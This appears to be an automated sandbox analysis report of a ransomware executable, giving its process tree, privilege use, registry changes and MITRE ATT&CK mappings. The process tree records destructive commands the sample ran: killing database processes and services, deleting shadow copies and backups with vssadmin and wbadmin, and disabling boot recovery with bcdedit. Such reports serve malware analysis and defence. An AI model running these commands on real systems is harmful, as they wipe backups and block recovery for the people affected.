2240	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe
2240	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe
2240	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe
2240	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe
2240	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe
2240	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe
2240	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe
2240	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe
2240	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe
2240	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe
2240	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe
2240	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe
2240	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe
2240	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe
2240	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe
2240	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe
2240	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe
2240	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe
2240	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe

Suspicious use of AdjustPrivilegeToken 35 IoCs

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exeWMIC.exevssvc.exe

description	pid	process
Token: SeDebugPrivilege	2604	taskkill.exe
Token: SeDebugPrivilege	2492	taskkill.exe
Token: SeDebugPrivilege	2452	taskkill.exe
Token: SeDebugPrivilege	2008	taskkill.exe
Token: SeDebugPrivilege	2648	taskkill.exe
Token: SeDebugPrivilege	2260	taskkill.exe
Token: SeDebugPrivilege	1484	taskkill.exe
Token: SeDebugPrivilege	2468	taskkill.exe
Token: SeDebugPrivilege	2880	taskkill.exe
Token: SeDebugPrivilege	2192	taskkill.exe
Token: SeDebugPrivilege	2024	taskkill.exe
Token: SeDebugPrivilege	1416	taskkill.exe
Token: SeIncreaseQuotaPrivilege	2608	WMIC.exe
Token: SeSecurityPrivilege	2608	WMIC.exe
Token: SeTakeOwnershipPrivilege	2608	WMIC.exe
Token: SeLoadDriverPrivilege	2608	WMIC.exe
Token: SeSystemProfilePrivilege	2608	WMIC.exe
Token: SeSystemtimePrivilege	2608	WMIC.exe
Token: SeProfSingleProcessPrivilege	2608	WMIC.exe
Token: SeIncBasePriorityPrivilege	2608	WMIC.exe
Token: SeCreatePagefilePrivilege	2608	WMIC.exe
Token: SeBackupPrivilege	2608	WMIC.exe
Token: SeRestorePrivilege	2608	WMIC.exe
Token: SeShutdownPrivilege	2608	WMIC.exe
Token: SeDebugPrivilege	2608	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2608	WMIC.exe
Token: SeRemoteShutdownPrivilege	2608	WMIC.exe
Token: SeUndockPrivilege	2608	WMIC.exe
Token: SeManageVolumePrivilege	2608	WMIC.exe
Token: 33	2608	WMIC.exe
Token: 34	2608	WMIC.exe
Token: 35	2608	WMIC.exe
Token: SeBackupPrivilege	2096	vssvc.exe
Token: SeRestorePrivilege	2096	vssvc.exe
Token: SeAuditPrivilege	2096	vssvc.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 2240 wrote to memory of 2948	2240	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe	cmd.exe
PID 2240 wrote to memory of 2948	2240	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe	cmd.exe
PID 2240 wrote to memory of 2948	2240	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe	cmd.exe
PID 2240 wrote to memory of 2948	2240	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe	cmd.exe
PID 2948 wrote to memory of 2484	2948	cmd.exe	cmd.exe
PID 2948 wrote to memory of 2484	2948	cmd.exe	cmd.exe
PID 2948 wrote to memory of 2484	2948	cmd.exe	cmd.exe
PID 2948 wrote to memory of 2484	2948	cmd.exe	cmd.exe
PID 2240 wrote to memory of 2524	2240	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe	cmd.exe
PID 2240 wrote to memory of 2524	2240	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe	cmd.exe
PID 2240 wrote to memory of 2524	2240	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe	cmd.exe
PID 2240 wrote to memory of 2524	2240	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe	cmd.exe
PID 2524 wrote to memory of 2592	2524	cmd.exe	cmd.exe
PID 2524 wrote to memory of 2592	2524	cmd.exe	cmd.exe
PID 2524 wrote to memory of 2592	2524	cmd.exe	cmd.exe
PID 2524 wrote to memory of 2592	2524	cmd.exe	cmd.exe
PID 2592 wrote to memory of 2604	2592	cmd.exe	taskkill.exe
PID 2592 wrote to memory of 2604	2592	cmd.exe	taskkill.exe
PID 2592 wrote to memory of 2604	2592	cmd.exe	taskkill.exe
PID 2240 wrote to memory of 2696	2240	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe	cmd.exe
PID 2240 wrote to memory of 2696	2240	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe	cmd.exe
PID 2240 wrote to memory of 2696	2240	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe	cmd.exe
PID 2240 wrote to memory of 2696	2240	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe	cmd.exe
PID 2696 wrote to memory of 2408	2696	cmd.exe	cmd.exe
PID 2696 wrote to memory of 2408	2696	cmd.exe	cmd.exe
PID 2696 wrote to memory of 2408	2696	cmd.exe	cmd.exe
PID 2696 wrote to memory of 2408	2696	cmd.exe	cmd.exe
PID 2408 wrote to memory of 2744	2408	cmd.exe	taskkill.exe
PID 2408 wrote to memory of 2744	2408	cmd.exe	taskkill.exe
PID 2408 wrote to memory of 2744	2408	cmd.exe	taskkill.exe
PID 2240 wrote to memory of 2632	2240	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe	cmd.exe
PID 2240 wrote to memory of 2632	2240	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe	cmd.exe
PID 2240 wrote to memory of 2632	2240	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe	cmd.exe
PID 2240 wrote to memory of 2632	2240	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe	cmd.exe
PID 2632 wrote to memory of 2692	2632	cmd.exe	cmd.exe
PID 2632 wrote to memory of 2692	2632	cmd.exe	cmd.exe
PID 2632 wrote to memory of 2692	2632	cmd.exe	cmd.exe
PID 2632 wrote to memory of 2692	2632	cmd.exe	cmd.exe
PID 2692 wrote to memory of 2492	2692	cmd.exe	taskkill.exe
PID 2692 wrote to memory of 2492	2692	cmd.exe	taskkill.exe
PID 2692 wrote to memory of 2492	2692	cmd.exe	taskkill.exe
PID 2240 wrote to memory of 2384	2240	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe	cmd.exe
PID 2240 wrote to memory of 2384	2240	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe	cmd.exe
PID 2240 wrote to memory of 2384	2240	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe	cmd.exe
PID 2240 wrote to memory of 2384	2240	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe	cmd.exe
PID 2384 wrote to memory of 2444	2384	cmd.exe	cmd.exe
PID 2384 wrote to memory of 2444	2384	cmd.exe	cmd.exe
PID 2384 wrote to memory of 2444	2384	cmd.exe	cmd.exe
PID 2384 wrote to memory of 2444	2384	cmd.exe	cmd.exe
PID 2444 wrote to memory of 2452	2444	cmd.exe	taskkill.exe
PID 2444 wrote to memory of 2452	2444	cmd.exe	taskkill.exe
PID 2444 wrote to memory of 2452	2444	cmd.exe	taskkill.exe
PID 2240 wrote to memory of 2868	2240	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe	cmd.exe
PID 2240 wrote to memory of 2868	2240	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe	cmd.exe
PID 2240 wrote to memory of 2868	2240	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe	cmd.exe
PID 2240 wrote to memory of 2868	2240	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe	cmd.exe
PID 2868 wrote to memory of 2308	2868	cmd.exe	cmd.exe
PID 2868 wrote to memory of 2308	2868	cmd.exe	cmd.exe
PID 2868 wrote to memory of 2308	2868	cmd.exe	cmd.exe
PID 2868 wrote to memory of 2308	2868	cmd.exe	cmd.exe
PID 2308 wrote to memory of 2008	2308	cmd.exe	taskkill.exe
PID 2308 wrote to memory of 2008	2308	cmd.exe	taskkill.exe
PID 2308 wrote to memory of 2008	2308	cmd.exe	taskkill.exe
PID 2240 wrote to memory of 1724	2240	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe	cmd.exe

System policy modification 1 TTPs 4 IoCs

evasion

Modify Registry

T1112

Processes:

51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1"	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1"	51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:1136
- C:\Users\Admin\AppData\Local\Temp\51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe
  "C:\Users\Admin\AppData\Local\Temp\51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Adds Run key to start application
  - Enumerates connected drives
  - Drops file in Program Files directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  - System policy modification
  PID:2240
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c rem Kill \"SQL\"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2948
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c rem Kill \"SQL\"
      4⤵
      PID:2484
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlbrowser.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2524
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c taskkill -f -im sqlbrowser.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2592
    - - C:\Windows\system32\taskkill.exe
        
        taskkill -f -im sqlbrowser.exe
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2604
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sql writer.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2696
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c taskkill -f -im sql writer.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2408
    - - C:\Windows\system32\taskkill.exe
        
        taskkill -f -im sql writer.exe
        5⤵
        Kills process with taskkill
        
        PID:2744
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlserv.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2632
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c taskkill -f -im sqlserv.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2692
    - - C:\Windows\system32\taskkill.exe
        
        taskkill -f -im sqlserv.exe
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2492
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im msmdsrv.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2384
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c taskkill -f -im msmdsrv.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2444
    - - C:\Windows\system32\taskkill.exe
        
        taskkill -f -im msmdsrv.exe
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2452
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im MsDtsSrvr.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2868
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c taskkill -f -im MsDtsSrvr.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2308
    - - C:\Windows\system32\taskkill.exe
        
        taskkill -f -im MsDtsSrvr.exe
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2008
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlceip.exe
    3⤵
    PID:1724
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c taskkill -f -im sqlceip.exe
      4⤵
      PID:2448
    - - C:\Windows\system32\taskkill.exe
        
        taskkill -f -im sqlceip.exe
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2648
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im fdlauncher.exe
    3⤵
    PID:2628
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c taskkill -f -im fdlauncher.exe
      4⤵
      PID:1444
    - - C:\Windows\system32\taskkill.exe
        
        taskkill -f -im fdlauncher.exe
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2260
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im Ssms.exe
    3⤵
    PID:1632
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c taskkill -f -im Ssms.exe
      4⤵
      PID:1996
    - - C:\Windows\system32\taskkill.exe
        
        taskkill -f -im Ssms.exe
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:1484
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im SQLAGENT.EXE
    3⤵
    PID:2160
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c taskkill -f -im SQLAGENT.EXE
      4⤵
      PID:1280
    - - C:\Windows\system32\taskkill.exe
        
        taskkill -f -im SQLAGENT.EXE
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2468
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im fdhost.exe
    3⤵
    PID:2044
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c taskkill -f -im fdhost.exe
      4⤵
      PID:1964
    - - C:\Windows\system32\taskkill.exe
        
        taskkill -f -im fdhost.exe
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2880
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im ReportingServicesService.exe
    3⤵
    PID:2036
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c taskkill -f -im ReportingServicesService.exe
      4⤵
      PID:2224
    - - C:\Windows\system32\taskkill.exe
        
        taskkill -f -im ReportingServicesService.exe
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2192
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im msftesql.exe
    3⤵
    PID:2164
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c taskkill -f -im msftesql.exe
      4⤵
      PID:2176
    - - C:\Windows\system32\taskkill.exe
        
        taskkill -f -im msftesql.exe
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2024
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im pg_ctl.exe
    3⤵
    PID:444
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c taskkill -f -im pg_ctl.exe
      4⤵
      PID:564
    - - C:\Windows\system32\taskkill.exe
        
        taskkill -f -im pg_ctl.exe
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:1416
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -impostgres.exe
    3⤵
    PID:1404
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c taskkill -f -impostgres.exe
      4⤵
      PID:1736
    - - C:\Windows\system32\taskkill.exe
        
        taskkill -f -impostgres.exe
        5⤵
        Kills process with taskkill
        
        PID:2720
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop MSSQLServerADHelper100
    3⤵
    PID:1788
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c net stop MSSQLServerADHelper100
      4⤵
      PID:2348
    - - C:\Windows\system32\net.exe
        
        net stop MSSQLServerADHelper100
        5⤵
        
        PID:108
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop MSSQLServerADHelper100
        6⤵
        
        PID:912
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop MSSQL$ISARS
    3⤵
    PID:2020
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c net stop MSSQL$ISARS
      4⤵
      PID:1980
    - - C:\Windows\system32\net.exe
        
        net stop MSSQL$ISARS
        5⤵
        
        PID:988
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop MSSQL$ISARS
        6⤵
        
        PID:448
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop MSSQL$MSFW
    3⤵
    PID:1104
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c net stop MSSQL$MSFW
      4⤵
      PID:2972
    - - C:\Windows\system32\net.exe
        
        net stop MSSQL$MSFW
        5⤵
        
        PID:992
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop MSSQL$MSFW
        6⤵
        
        PID:2312
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLAgent$ISARS
    3⤵
    PID:2220
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c net stop SQLAgent$ISARS
      4⤵
      PID:1252
    - - C:\Windows\system32\net.exe
        
        net stop SQLAgent$ISARS
        5⤵
        
        PID:668
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop SQLAgent$ISARS
        6⤵
        
        PID:1476
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLAgent$MSFW
    3⤵
    PID:1696
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c net stop SQLAgent$MSFW
      4⤵
      PID:1300
    - - C:\Windows\system32\net.exe
        
        net stop SQLAgent$MSFW
        5⤵
        
        PID:1796
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop SQLAgent$MSFW
        6⤵
        
        PID:1904
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLBrowser
    3⤵
    PID:756
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c net stop SQLBrowser
      4⤵
      PID:1628
    - - C:\Windows\system32\net.exe
        
        net stop SQLBrowser
        5⤵
        
        PID:240
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop SQLBrowser
        6⤵
        
        PID:900
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop REportServer$ISARS
    3⤵
    PID:908
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c net stop REportServer$ISARS
      4⤵
      PID:2996
    - - C:\Windows\system32\net.exe
        
        net stop REportServer$ISARS
        5⤵
        
        PID:688
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop REportServer$ISARS
        6⤵
        
        PID:556
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLWriter
    3⤵
    PID:692
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c net stop SQLWriter
      4⤵
      PID:2932
    - - C:\Windows\system32\net.exe
        
        net stop SQLWriter
        5⤵
        
        PID:2280
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c vssadmin.exe Delete Shadows /All /Quiet
    3⤵
    PID:1472
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c vssadmin.exe Delete Shadows /All /Quiet
      4⤵
      PID:2792
    - - C:\Windows\system32\vssadmin.exe
        
        vssadmin.exe Delete Shadows /All /Quiet
        5⤵
        Interacts with shadow copies
        
        PID:2624
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wbadmin delete backup -keepVersion:0 -quiet
    3⤵
    PID:3048
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c wbadmin delete backup -keepVersion:0 -quiet
      4⤵
      PID:2976
    - - C:\Windows\system32\wbadmin.exe
        
        wbadmin delete backup -keepVersion:0 -quiet
        5⤵
        Deletes system backups
        
        PID:2408
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTATEBACKUP
    3⤵
    PID:984
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTATEBACKUP
      4⤵
      PID:1744
    - - C:\Windows\system32\wbadmin.exe
        
        wbadmin DELETE SYSTEMSTATEBACKUP
        5⤵
        Deletes System State backups
        
        PID:2688
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTABACKUP -deleteOldest
    3⤵
    PID:1704
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTABACKUP -deleteOldest
      4⤵
      PID:1660
    - - C:\Windows\system32\wbadmin.exe
        
        wbadmin DELETE SYSTEMSTABACKUP -deleteOldest
        5⤵
        Drops file in Windows directory
        
        PID:2908
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wmic.exe SHADOWCOPY /nointeractive
    3⤵
    PID:1956
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c wmic.exe SHADOWCOPY /nointeractive
      4⤵
      PID:1748
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic.exe SHADOWCOPY /nointeractive
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2608
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c bcdedit.exe /set {default} recoverynabled No
    3⤵
    PID:3000
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c bcdedit.exe /set {default} recoverynabled No
      4⤵
      PID:1500
    - - C:\Windows\system32\bcdedit.exe
        
        bcdedit.exe /set {default} recoverynabled No
        5⤵
        Modifies boot configuration data using bcdedit
        
        PID:2524
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
    3⤵
    PID:1664
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
      4⤵
      PID:2748
    - - C:\Windows\system32\bcdedit.exe
        
        bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
        5⤵
        Modifies boot configuration data using bcdedit
        
        PID:2480
- C:\Users\Admin\AppData\Local\Temp\51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe
  \\?\C:\Users\Admin\AppData\Local\Temp\51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51.exe -network
  2⤵
  - Adds Run key to start application
  - System policy modification
  PID:1432

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLWriter
1⤵
PID:1508

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2096

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\Microsoft Office\Office14\1033\GRAPH_F_COL.HXK

Filesize
1KB

MD5
451887f83a288ee6481dffecc6c06d84

